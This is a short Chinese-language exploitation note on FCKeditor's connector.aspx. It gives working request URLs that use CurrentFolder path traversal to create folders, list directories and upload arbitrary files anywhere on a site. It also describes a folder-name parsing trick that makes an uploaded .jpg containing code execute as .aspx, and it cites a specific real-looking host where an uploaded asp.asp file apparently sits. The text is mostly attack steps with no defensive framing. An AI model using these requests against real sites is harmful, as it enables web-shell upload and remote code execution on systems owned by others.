FCK中的文件上传漏洞:基本是上connector.aspx文件的漏洞
1.CurrentFolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
2.CurrentFolder 参数,根据返回的XML信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过XML返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3.上传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
4.同时修改Type 和CurrentFolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp
5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等。
利用文件解析漏洞,在该文件夹下上传有代码的.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。
如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。